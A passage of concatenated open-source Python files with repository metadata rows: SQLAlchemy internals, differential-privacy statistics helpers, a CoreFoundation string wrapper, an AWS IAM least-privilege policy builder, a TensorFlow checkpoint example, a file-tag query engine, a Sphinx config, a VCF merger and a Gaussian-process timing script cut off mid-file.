def operate(self, op, other):
return op(
func.lower(self.__clause_element__()),
func.lower(other)
)
Base = declarative_base()
class SearchWord(Base):
__tablename__ = 'search_word'
id = Column(Integer, primary_key=True)
word = Column(String)
word_insensitive = comparable_property(lambda prop, mapper:
CaseInsensitiveComparator(
mapper.c.word, mapper)
)
A mapping like the above allows the ``word_insensitive`` attribute
to render an expression like::
>>> print SearchWord.word_insensitive == "Trucks"
lower(search_word.word) = lower(:lower_1)
:param comparator_factory:
A PropComparator subclass or factory that defines operator behavior
for this property.
:param descriptor:
Optional when used in a ``properties={}`` declaration. The Python
descriptor or property to layer comparison behavior on top of.
The like-named descriptor will be automatically retrieved from the
mapped class if left blank in a ``properties`` declaration.
:param info: Optional data dictionary which will be populated into the
:attr:`.InspectionAttr.info` attribute of this object.
.. versionadded:: 1.0.0
"""
super(ComparableProperty, self).__init__()
self.descriptor = descriptor
self.comparator_factory = comparator_factory
self.doc = doc or (descriptor and descriptor.__doc__) or None
if info:
self.info = info
util.set_creation_order(self)
def _comparator_factory(self, mapper):
return self.comparator_factory(self, mapper)
| gpl-3.0 | 7,448,052,880,767,229,000 | 34.993515 | 79 | 0.569097 | false |
fy/compare_dp_mechanisms | notebooks/utility_functions.py | 1 | 3409 | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <markdowncell>
# Utility functions.
# <codecell>
import numpy as np
# <codecell>
def get_chisq_sensitivity(NN_case, NN_control):
"""sensitivity for the chi-square statistic based on 2x3 genotype tables"""
NN = NN_case + NN_control # total number of subjects
CC_max = max(NN_case, NN_control)
CC_min = min(NN_case, NN_control)
sensitivity = 1. * NN**2 / (CC_min * (CC_max + 1)) # sensitivity of chisq
return sensitivity
# <codecell>
def get_allelic_test_sensitivity(NN_case, NN_control):
"""sensitivity for the chi-square statistic based on 2x2 allelic tables derived from 2x3 genotype tables"""
def sensitivity_type_1(SS, RR):
NN = SS + RR
return 1.0 * 8 * NN**2 * SS / \
(RR * (2 * SS + 3) * (2 * SS + 1))
def sensitivity_type_2(SS, RR):
NN = SS + RR
return 1.0 * 4 * NN**2 * ((2 * RR**2 - 1) * (2 * SS - 1) - 1) / \
(SS * RR * (2 * RR + 1) * (2 * RR - 1) * (2 * SS + 1))
return np.max([sensitivity_type_1(NN_case, NN_control),
sensitivity_type_1(NN_control, NN_case),
sensitivity_type_2(NN_case, NN_control),
sensitivity_type_2(NN_control, NN_case)])
# <codecell>
def check_table_valid(input_table):
"""Make sure that the margins (row sums and column sums ) are all positive.
Args:
input_table: A 2x3 numpy matrix.
"""
## check zero margins
rowsum = np.array(map(np.sum, input_table))
colsum = np.array(map(np.sum, input_table.T))
if np.any(rowsum == 0) or np.any(colsum == 0):
return False
else:
return True
# <codecell>
def chisq_stat(input_table):
"""Calculate the Pearson's chi-square staitsitc.
Args:
input_table: A 2x3 numpy matrix.
Returns:
A tuple (chisquare_statistics, degree_of_freedom).
"""
input_table = input_table.astype(float)
rowsum = np.array(map(np.sum, input_table))
colsum = np.array(map(np.sum, input_table.T))
expected = np.outer(rowsum, colsum) / np.sum(rowsum)
# df = (len([1 for rr in rowsum if rr > 0]) - 1) * \
# (len([1 for cc in colsum if cc > 0]) - 1)
chisq = np.sum(np.array(input_table[expected > 0] -
expected[expected > 0]) ** 2 /
expected[expected > 0])
# return (chisq, df)
return chisq
# <codecell>
def chisq_gradient(input_table):
"""Return the changable part of the gradient of the chi-square staitsitc.
Args:
input_table: A 2x3 numpy matrix.
Returns:
A four-element tuple consisting of the partial derivatives based on the
parametrization the chi-square statistic by (r0, r1, n0, n1). The
full parametrization would be
(r0, r1, r2, s0, s1, s2, n0, n1, n2), where ri + si = ni. The returned
value will be scaled down by N^2 / (R * S).
"""
input_table = input_table.astype(float)
colsum = np.array(map(np.sum, input_table.T))
## divide each cell by colsum
fraction_table = input_table / colsum
dy_dr0, dy_dr1 = [2 * fraction_table[0, ii] - 2 * fraction_table[0, 2] for
ii in [0, 1]]
dy_dn0, dy_dn1 = [-fraction_table[0, ii] ** 2 + fraction_table[0, 2] ** 2 for
ii in [0, 1]]
return (dy_dr0, dy_dr1, dy_dn0, dy_dn1)
| mit | 3,960,275,843,723,750,000 | 32.097087 | 111 | 0.576709 | false |
Flavsditz/projects | eyeTracking/pupil/pupil_src/shared_modules/uvc_capture/mac_video/cf_string.py | 1 | 2685 | '''
(*)~----------------------------------------------------------------------------------
Pupil - eye tracking platform
Copyright (C) 2012-2013 Moritz Kassner & William Patera
Distributed under the terms of the CC BY-NC-SA License.
License details are in the file license.txt, distributed as part of this software.
----------------------------------------------------------------------------------~(*)
'''
# Python string to/from CFString conversion helper functions:
from ctypes import *
from ctypes import util
cf = cdll.LoadLibrary(util.find_library('CoreFoundation'))
# Setup return types for functions that return pointers.
# (Otherwise ctypes returns 32-bit int which breaks on 64-bit systems.)
# Note that you must also wrap the return value with c_void_p before
# you use it as an argument to another function, otherwise ctypes will
# automatically convert it back to a 32-bit int again.
cf.CFDictionaryCreateMutable.restype = c_void_p
cf.CFStringCreateWithCString.restype = c_void_p
cf.CFAttributedStringCreate.restype = c_void_p
cf.CFDataCreate.restype = c_void_p
cf.CFNumberCreate.restype = c_void_p
# Core Foundation constants
kCFStringEncodingUTF8 = 0x08000100
kCFStringEncodingMacRoman = 0
kCFStringEncodingWindowsLatin1 = 0x0500
kCFStringEncodingISOLatin1 = 0x0201
kCFStringEncodingNextStepLatin = 0x0B01
kCFStringEncodingASCII = 0x0600
kCFStringEncodingUnicode = 0x0100
kCFStringEncodingUTF8 = 0x08000100
kCFStringEncodingNonLossyASCII = 0x0BFF
kCFStringEncodingUTF16 = 0x0100
kCFStringEncodingUTF16BE = 0x10000100
kCFStringEncodingUTF16LE = 0x14000100
kCFStringEncodingUTF32 = 0x0c000100
kCFStringEncodingUTF32BE = 0x18000100
kCFStringEncodingUTF32LE = 0x1c000100
kCFNumberSInt32Type = 3
def CFSTR(text):
return c_void_p(cf.CFStringCreateWithCString(None, text.encode('utf8'), kCFStringEncodingASCII))
def cfstring_to_string(cfstring):
length = cf.CFStringGetLength(cfstring)
size = cf.CFStringGetMaximumSizeForEncoding(length, kCFStringEncodingASCII)
buffer = c_buffer(size + 1)
result = cf.CFStringGetCString(cfstring, buffer, len(buffer), kCFStringEncodingASCII)
if result:
return buffer.value
def cfstring_to_string_release(cfstring):
length = cf.CFStringGetLength(cfstring)
size = cf.CFStringGetMaximumSizeForEncoding(length, kCFStringEncodingASCII)
buffer = c_buffer(size + 1)
result = cf.CFStringGetCString(cfstring, buffer, len(buffer), kCFStringEncodingASCII)
cf.CFRelease(cfstring)
if result:
return buffer.value
def release(cfstring):
cf.CFRelease(cfstring)
if __name__ == '__main__':
cf_pointer = CFSTR("THIS is a Test")
print cfstring_to_string(cf_pointer)
| gpl-2.0 | -7,743,753,104,019,920,000 | 35.283784 | 100 | 0.731844 | false |
1Strategy/security-fairy | aws_iam_policy.py | 1 | 5068 |
import logging
import json
import re
class IAMPolicy:
def __init__(self, logging_level = logging.DEBUG):
logging.basicConfig(level=logging_level)
self.statements = []
self.service_actions = {}
self.max_policy_size = {
'user' : 2048, # User policy size cannot exceed 2,048 characters
'role' : 10240, # Role policy size cannot exceed 10,240 characters
'group': 5120 # Group policy size cannot exceed 5,120 characters
}
def __add_statement__(self, statement):
if not isinstance(statement, IAMStatement):
raise Exception('This Method only supports objects of type IAMStatement')
self.statements.append(statement)
def add_actions(self, statement_actions):
for statement_action in statement_actions:
self.add_action(statement_action)
def add_action(self, statement_action):
split_statement_action = statement_action.split(':')
if len(split_statement_action) != 2:
raise InvalidStatementAction('Invalid Statement: {action} Statement must be \'service:api-action\'.'.format(action=action))
service = self.__get_service_alias__(split_statement_action[0])
if service == 'lambda':
# Checks for extraneous lambda api version information:
# e.g. lambda:ListTags20170331
# lambda:GetFunctionConfiguration20150331v2"
# lambda:"UpdateFunctionCode20150331v2"
api_version_info = re.findall(r"(\d+v\d+)|(\d+)", split_statement_action[1])
if api_version_info:
for api_version in api_version_info[0]:
logging.debug(api_version)
if api_version is not '':
action = split_statement_action[1].replace(api_version,'')
else:
action = split_statement_action[1]
else:
action = split_statement_action[1]
logging.debug(statement_action)
logging.debug(self.service_actions.get(service))
if self.service_actions.get(service) is None:
self.service_actions[service] = []
if not action in self.service_actions[service]:
self.service_actions[service].append(action)
logging.debug("Action added: {service}:{action}".format(service=service, action=action))
def __get_service_alias__(self, service):
service_aliases = {
"monitoring": "cloudwatch"
}
return service_aliases.get(service, service)
def __build_statements__(self):
for service in self.service_actions:
actions_per_service = []
for action in self.service_actions[service]:
actions_per_service.append(service+":"+action)
statement = IAMStatement( effect="Allow",
actions=actions_per_service,
resource="*",
sid='SecurityFairyBuilt{service}Policy'.format(service=service.capitalize())
)
self.__add_statement__(statement)
def get_policy(self):
self.__build_statements__()
built_policy_statements = []
for statement in self.statements:
built_policy_statements.append(statement.get_statement())
policy = {
"Version": "2012-10-17",
"Statement": built_policy_statements
}
logging.debug(policy)
return policy
def print_policy(self):
return json.dumps(self.get_policy())
class IAMStatement:
def __init__(self, effect, actions, resource, sid='', logging_level = logging.DEBUG):
logging.basicConfig(level=logging_level)
self.validate_statement(effect, actions, resource)
self.actions = actions
self.resource = resource
self.effect = effect
if sid != '':
self.sid = sid
def validate_statement(self, effect, actions, resource):
if not effect.lower() in ['allow', 'deny']:
logging.debug(effect)
raise InvalidStatementAction("Valid Effects are 'Allow' and 'Deny'.")
if not resource == '*':
logging.debug(resource)
raise Exception('Invalid Resource.')
logging.debug(actions)
for action in actions:
if len(action.split(':')) != 2:
raise InvalidStatementAction('Invalid Statement: {action} Statement must be \'service:api-action\'.'.format(action=action))
self.actions = actions
def get_statement(self):
if self.actions == []:
raise Exception('This statement has no Actions')
statement = {
"Effect": self.effect,
"Resource": self.resource,
"Action": self.actions
}
if self.sid != '':
statement['Sid'] = self.sid
return statement
| apache-2.0 | -6,934,768,332,968,634,000 | 37.105263 | 139 | 0.572612 | false |
khalido/nd101 | tf_save_check.py | 1 | 1112 | import tensorflow as tf
# The file path to save the data
save_file = './model.ckpt'
# Two Tensor Variables: weights and bias
weights = tf.Variable(tf.truncated_normal([2, 3]))
bias = tf.Variable(tf.truncated_normal([3]))
# Class used to save and/or restore Tensor Variables
saver = tf.train.Saver()
with tf.Session() as sess:
# Initialize all the Variables
sess.run(tf.global_variables_initializer())
# Show the values of weights and bias
print('Weights:')
print(sess.run(weights))
print('Bias:')
print(sess.run(bias))
# Save the model
saver.save(sess, save_file)
# Remove the previous weights and bias
tf.reset_default_graph()
# Two Variables: weights and bias
weights = tf.Variable(tf.truncated_normal([2, 3]))
bias = tf.Variable(tf.truncated_normal([3]))
# Class used to save and/or restore Tensor Variables
saver = tf.train.Saver()
with tf.Session() as sess:
# Load the weights and bias
saver.restore(sess, save_file)
# Show the values of weights and bias
print('Weight:')
print(sess.run(weights))
print('Bias:')
print(sess.run(bias)) | gpl-3.0 | 3,808,513,290,078,029,300 | 24.883721 | 52 | 0.690647 | false |
hakuya/higu | lib/hdbfs/query.py | 1 | 12573 | import calendar
import datetime
import hdbfs
import model
class TagConstraint:
def __init__( self, tag ):
self.__tag = tag
def to_db_constraint( self, db ):
if( isinstance( self.__tag, hdbfs.Obj ) ):
tag = self.__tag
elif( isinstance( self.__tag, int ) ):
tag = db.get_object_by_id( self.__tag )
else:
tag = db.get_tag( self.__tag )
return db.session.query( model.Relation.child_id ) \
.filter( model.Relation.parent_id == tag.obj.object_id )
class StringConstraint:
def __init__( self, s ):
self.__s = s
def to_db_constraint( self, db ):
if( len( self.__s ) == 0 ):
sql_s = '%'
else:
sql_s = self.__s.replace( '%', '[%]' ) \
.replace( '*', '%' )
if( sql_s[0] != '%' ):
sql_s = '%' + sql_s
if( sql_s[-1] != '%' ):
sql_s = sql_s + '%'
return db.session.query( model.Object.object_id ) \
.filter( model.Object.name.like( sql_s ) )
class UnboundConstraint:
def __init__( self, s ):
self.__s = s
def to_db_constraint( self, db ):
try:
c = TagConstraint( self.__s )
db_c = c.to_db_constraint( db )
if( db_c is not None ):
return db_c
except:
pass
c = StringConstraint( self.__s )
return c.to_db_constraint( db )
def QueryInt( v, ceil = False ):
try:
# Try as int
return int( v )
except ValueError:
# Try as date
if( '_' in v ):
date_str, time_str = v.split( '_' )
else:
date_str = v
time_str = None
date_str = v.split( '/' )
year = int( date_str[0] )
dmon = int( date_str[1] ) if( len( date_str ) >= 2 ) else 1
dday = int( date_str[2] ) if( len( date_str ) >= 3 ) else 1
if( len( date_str ) >= 4 ):
raise ValueError
if( time_str is not None and len( date_str ) >= 3 ):
time_str = time_str.split( ':' )
hour = int( time_str[0] ) if( len( time_str ) >= 1 ) else 0
tmin = int( time_str[1] ) if( len( time_str ) >= 2 ) else 0
tsec = int( time_str[2] ) if( len( time_str ) >= 3 ) else 0
if( len( time_str ) >= 4 ):
raise ValueError
else:
hour = 0
tmin = 0
tsec = 0
if( ceil ):
if( len( date_str ) == 1 ):
year += 1
elif( len( date_str ) == 2 ):
dmon += 1
elif( len( date_str ) == 3 ):
if( time_str is None or len( time_str ) == 0 ):
dday += 1
elif( len( time_str ) == 1 ):
hour += 1
elif( len( time_str ) == 2 ):
tmin += 1
elif( len( time_str ) == 3 ):
tsec += 1
dt = datetime.datetime( year, dmon, dday, hour, tmin, tsec )
dt = calendar.timegm( dt.timetuple() )
if( ceil ):
dt -= 1
return dt
class ObjIdConstraint:
def __init__( self, op, value ):
from sqlalchemy import and_
if( op == '=' ):
self.__constraint = (model.Object.object_id == int( value ))
elif( op == '!=' ):
self.__constraint = (model.Object.object_id != int( value ))
elif( op == '>' ):
self.__constraint = (model.Object.object_id > int( value ))
elif( op == '>=' ):
self.__constraint = (model.Object.object_id >= int( value ))
elif( op == '<' ):
self.__constraint = (model.Object.object_id < int( value ))
elif( op == '<=' ):
self.__constraint = (model.Object.object_id <= int( value ))
elif( op == '~' ):
if( '-' in value ):
lower, upper = map( int, value.split( '-' ) )
elif( '|' in value ):
value, vrange = map( int, value.split( '|' ) )
lower = value - vrange
upper = value + vrange
else:
lower = int( value )
upper = lower
if( lower != upper ):
self.__constraint = and_( model.Object.object_id >= lower,
model.Object.object_id <= upper )
else:
self.__constraint = (model.Object.object_id == lower)
else:
assert False
def to_db_constraint( self, db ):
return db.session.query( model.Object.object_id ) \
.filter( self.__constraint )
class ParameterConstraint:
def __init__( self, key, op, value ):
from sqlalchemy import and_
self.__key = key
if( op == '=' ):
self.__constraint = (model.ObjectMetadata.value == str( value ))
elif( op == '!=' ):
self.__constraint = (model.ObjectMetadata.value != str( value ))
elif( op == '>' ):
self.__constraint = (model.ObjectMetadata.numeric > QueryInt( value ))
elif( op == '>=' ):
self.__constraint = (model.ObjectMetadata.numeric >= QueryInt( value ))
elif( op == '<' ):
self.__constraint = (model.ObjectMetadata.numeric < QueryInt( value ))
elif( op == '<=' ):
self.__constraint = (model.ObjectMetadata.numeric <= QueryInt( value ))
elif( op == '~' ):
if( '-' in value ):
lower, upper = map( QueryInt, value.split( '-' ) )
elif( '|' in value ):
value, vrange = value.split( '|' )
lower = QueryInt( value, False ) - int( vrange )
upper = QueryInt( value, True ) + int( vrange )
else:
lower = QueryInt( value, False )
upper = QueryInt( value, True )
if( lower != upper ):
self.__constraint = and_( model.ObjectMetadata.numeric >= lower,
model.ObjectMetadata.numeric <= upper )
else:
self.__constraint = (model.ObjectMetadata.numeric == lower)
else:
assert False
def to_db_constraint( self, db ):
from sqlalchemy import and_
return db.session.query( model.ObjectMetadata.object_id ) \
.filter( and_( model.ObjectMetadata.key == self.__key, \
self.__constraint ) )
class Query:
def __init__( self ):
self.__obj_type = None
self.__order_by = 'rand'
self.__order_desc = False
self.__strict = False
self.__req_constraints = []
self.__or_constraints = []
self.__not_constraints = []
def set_strict( self ):
self.__strict = True
def set_type( self, obj_type ):
self.__obj_type = obj_type
def set_order( self, prop, desc = False ):
self.__order_by = prop
self.__order_desc = desc
def add_require_constraint( self, constraint ):
self.__req_constraints.append( constraint )
def add_or_constraint( self, constraint ):
self.__or_constraints.append( constraint )
def add_not_constraint( self, constraint ):
self.__not_constraints.append( constraint )
def set_constraints( self, req_c = [], or_c = [], not_c = [] ):
self.__req_constraints = list( req_c )
self.__or_constraints = list( or_c )
self.__not_constraints = list( not_c )
def execute( self, db ):
to_db_c = lambda c: c.to_db_constraint( db )
if( len( self.__or_constraints ) > 0 ):
add_q = map( to_db_c, self.__or_constraints )
add_q = add_q[0].union( *add_q[1:] )
else:
add_q = None
if( len( self.__not_constraints ) > 0 ):
sub_q = map( to_db_c, self.__not_constraints )
sub_q = sub_q[0].union( *sub_q[1:] )
else:
sub_q = None
if( len( self.__req_constraints ) > 0 ):
req_q = map( to_db_c, self.__req_constraints )
req_q = req_q[0].intersect( *req_q[1:] )
else:
req_q = None
query = db.session.query( model.Object )
if( req_q is not None ):
q = req_q
if( add_q is not None ):
q = q.union( add_q )
query = query.filter( model.Object.object_id.in_( q ) )
elif( add_q is not None ):
query = query.filter( model.Object.object_id.in_( add_q ) )
if( sub_q is not None ):
query = query.filter( ~model.Object.object_id.in_( sub_q ) )
if( self.__obj_type is not None ):
query = query.filter( model.Object.object_type == self.__obj_type )
else:
query = query.filter( model.Object.object_type.in_( [
hdbfs.TYPE_FILE, hdbfs.TYPE_ALBUM ] ) )
if( self.__order_by == 'rand' ):
query = query.order_by( 'RANDOM()' )
elif( self.__order_by == 'add' ):
if( not self.__order_desc ):
query = query.order_by( model.Object.object_id )
else:
query = query.order_by( model.Object.object_id.desc() )
elif( self.__order_by == 'name' ):
if( not self.__order_desc ):
query = query.order_by( model.Object.name,
model.Object.object_id )
else:
query = query.order_by( model.Object.name.desc(),
model.Object.object_id.desc() )
elif( self.__order_by == 'origin' ):
query = query.join( model.ObjectMetadata )\
.filter( model.ObjectMetadata.key == 'origin_time' )
if( not self.__order_desc ):
query = query.order_by( model.ObjectMetadata.numeric,
model.Object.object_id )
else:
query = query.order_by( model.ObjectMetadata.numeric.desc(),
model.Object.object_id.desc() )
return hdbfs.ModelObjToHiguObjIterator( db, query )
def create_constraint( s ):
if( s.startswith( '@' ) ):
return StringConstraint( s[1:] )
elif( s.startswith( '#' ) ):
return TagConstraint( s[1:] )
elif( s.startswith( '&' ) ):
ops = [ '>=', '<=', '>', '<', '!=', '=', '~' ]
s = s[1:]
for i in ops:
try:
idx = s.index( i[0] )
key = s[0:idx]
op = i
value = s[idx+len(i[0]):]
if( key == 'id' ):
return ObjIdConstraint( op, value )
else:
return ParameterConstraint( key, op, value )
except ValueError:
pass
else:
raise ValueError, 'Bad Parameter Constraint'
else:
return UnboundConstraint( s )
def build_query( s ):
query = Query()
clauses = s.split( ' ' )
clauses = [i for i in clauses if( len( i ) > 0 )]
commands = [i[1:] for i in clauses if( i[0] == '$' )]
add = [i[1:] for i in clauses if( i[0] == '?' )]
sub = [i[1:] for i in clauses if( i[0] == '!' )]
req = [i for i in clauses if( i[0] != '$' and i[0] != '?' and i[0] != '!' )]
for cmd in commands:
cmd = cmd.split( ':' )
if( cmd[0] == 'strict' ):
query.set_strict()
elif( cmd[0] == 'sort' ):
if( len( cmd ) < 2 ):
raise ValueError, 'Sort command needs an argument'
desc = False
if( len( cmd ) > 2 and cmd[2] == 'desc' ):
desc = True
query.set_order( cmd[1], desc )
elif( cmd[0] == 'type' ):
if( len( cmd ) < 2 ):
raise ValueError, 'Type command needs an argument'
if( cmd[1] == 'file' ):
query.set_type( hdbfs.TYPE_FILE );
elif( cmd[1] == 'album' ):
query.set_type( hdbfs.TYPE_ALBUM );
else:
raise ValueError, 'Bad type'
else:
raise ValueError, 'Bad Command'
req = map( create_constraint, req )
add = map( create_constraint, add )
sub = map( create_constraint, sub )
query.set_constraints( req, add, sub )
return query
| bsd-2-clause | -7,394,012,294,911,807,000 | 30.198511 | 83 | 0.459318 | false |
eloquence/unisubs | docs/conf.py | 1 | 6953 | # -*- coding: utf-8 -*-
#
# Amara documentation build configuration file, created by
# sphinx-quickstart on Mon Jul 25 14:58:38 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
import sphinx_rtd_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
sys.path.insert(0, os.path.abspath('../'))
import startup
startup.startup()
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinxcontrib.httpdomain',
'sphinxcontrib.napoleon',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Amara'
copyright = u'2012, Participatory Culture Foundation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.2.0'
# The full version, including alpha/beta/rc tags.
release = '1.2.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
autodoc_member_order = 'bysource'
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'UniversalSubtitlesdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'UniversalSubtitles.tex', u'Amara Documentation',
u'Participatory Culture Foundation', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'universalsubtitles', u'Amara Documentation',
[u'Participatory Culture Foundation'], 1)
]
| agpl-3.0 | -4,141,644,483,052,377,000 | 30.894495 | 80 | 0.709766 | false |
brguez/TEIBA | src/python/mergeVCF.py | 1 | 2384 | #!/usr/bin/env python
#coding: utf-8
#### FUNCTIONS ####
def header(string):
"""
Display header
"""
timeInfo = time.strftime("%Y-%m-%d %H:%M")
print '\n', timeInfo, "****", string, "****"
def subHeader(string):
"""
Display subheader
"""
timeInfo = time.strftime("%Y-%m-%d %H:%M")
print timeInfo, "**", string, "**"
def info(string):
"""
Display basic information
"""
timeInfo = time.strftime("%Y-%m-%d %H:%M")
print timeInfo, string
#### MAIN ####
## Import modules ##
import argparse
import sys
import os.path
import formats
import time
## Get user's input ##
parser = argparse.ArgumentParser(description="Merge multiple one-sample VCF files in a single one")
parser.add_argument('VCFPaths', help='text file with the path to the VCF files will be merged')
parser.add_argument('sampleId', help='Identifier to name output file.')
parser.add_argument('-o', '--outDir', default=os.getcwd(), dest='outDir', help='output directory. Default: current working directory.' )
args = parser.parse_args()
VCFPaths = args.VCFPaths
sampleId = args.sampleId
outDir = args.outDir
scriptName = os.path.basename(sys.argv[0])
## Display configuration to standard output ##
print
print "***** ", scriptName, " configuration *****"
print "VCF: ", VCFPaths
print "sampleId: ", sampleId
print "outDir: ", outDir
print
print "***** Executing ", scriptName, ".... *****"
print
## Start ##
#### 1. Create VCF object and read input VCF
header("1. Process input VCFs")
paths = open(VCFPaths, 'r')
# Make merged VCF object
completeVCFObj = formats.VCF()
## Read one VCF per iteration and add the variants to the merged VCF
for VCFfile in paths:
VCFfile = VCFfile.rstrip('\n\r')
VCFObj = formats.VCF()
VCFObj.read_VCF(VCFfile)
# Add variant objects
for lineObj in VCFObj.lineList:
completeVCFObj.addLine(lineObj)
# Create header
if completeVCFObj.header == "":
completeVCFObj.header = VCFObj.header
# Sort variants in the merged VCF object
completeVCFObj.lineList = completeVCFObj.sort()
#### Write output VCF file from merged VCF object
header("2. Write output VCF file")
outFilePath = outDir + '/' + sampleId + ".vcf"
# 1. Write header
completeVCFObj.write_header(outFilePath)
# 2. Write variants
completeVCFObj.write_variants(outFilePath)
header("Finished")
| gpl-3.0 | -8,237,825,818,623,232,000 | 22.544554 | 136 | 0.666526 | false |
jdavidrcamacho/Tests_GP | 08 - Thesis results/speed_test6.py | 1 | 5414 | import Gedi as gedi
import george
import numpy as np;
import matplotlib.pylab as pl; pl.close('all')
from time import time,sleep
import scipy.optimize as op
import sys
##### INITIAL DATA ###########################################################
nrep = 1
pontos=[]
temposQP=[]
temposmulti=[]
georgeQP=[]
sleeptime=10
lista=[10,20,50,100,200,500]
#for i in np.arange(100,650,200):
#for i in np.arange(100,1400,350):
### Functions george
# Define the objective function (negative log-likelihood in this case).
def nll(p):
# Update the kernel parameters and compute the likelihood.
gp.kernel[:] = p
ll = gp.lnlikelihood(y, quiet=True)
# The scipy optimizer doesn't play well with infinities.
return -ll if np.isfinite(ll) else 1e25
# And the gradient of the objective function.
def grad_nll(p):
# Update the kernel parameters and compute the likelihood.
gp.kernel[:] = p
return -gp.grad_lnlikelihood(y, quiet=True)
### Functions gedi
def nll_gedi(p):
global kernel
# Update the kernel parameters and compute the likelihood.
kernel= gedi.kernel_optimization.new_kernel(kernel,np.exp(p))
ll = gedi.kernel_likelihood.likelihood(kernel,x,y,yerr)
# The scipy optimizer doesn't play well with infinities.
return -ll if np.isfinite(ll) else 1e25
# And the gradient of the objective function.
def grad_nll_gedi(p):
global kernel
# Update the kernel parameters and compute the likelihood.
kernel= gedi.kernel_optimization.new_kernel(kernel,np.exp(p))
return -np.array(gedi.kernel_likelihood.gradient_likelihood(kernel,x,y,yerr))
###############################################################################
### Things to run
for i0, i in enumerate(lista):
f=open("{0}.txt".format(i),"w")
sys.stdout = f
print i
pontos.append(i)
print 'pontos', pontos
x = 10 * np.sort(np.random.rand(2*i))
yerr = 0.2 * np.ones_like(x)
y = np.sin(x) + yerr * np.random.randn(len(x))
av = []
for _ in range(nrep):
start= time()
kernel= gedi.kernel.QuasiPeriodic(15.0,2.0,1.0,10.0)
print 'Initial gedi kernel =',kernel
print 'Initial gedi likelihood =',gedi.kernel_likelihood.likelihood(kernel,x,y,yerr)
# Run the optimization routine.
p0_gedi = np.log(kernel.pars)
results_gedi = op.minimize(nll_gedi, p0_gedi, jac=grad_nll_gedi)
kernel= gedi.kernel_optimization.new_kernel(kernel,np.exp(results_gedi.x))
print 'Final gedi kernel =',kernel
print 'Final gedi likelihood =',gedi.kernel_likelihood.likelihood(kernel,x,y,yerr)
print
tempo1= time() - start
av.append(tempo1)
temposQP.append(sum(av) / float(nrep))
print 'temposQP', temposQP
sleep(sleeptime*i0)
###############################################################################
av = []
for _ in range(nrep):
start= time()
kernel= gedi.kernel.ExpSineSquared(15.0, 2.0, 10.0)* \
gedi.kernel.ExpSquared(1.0,1.0)
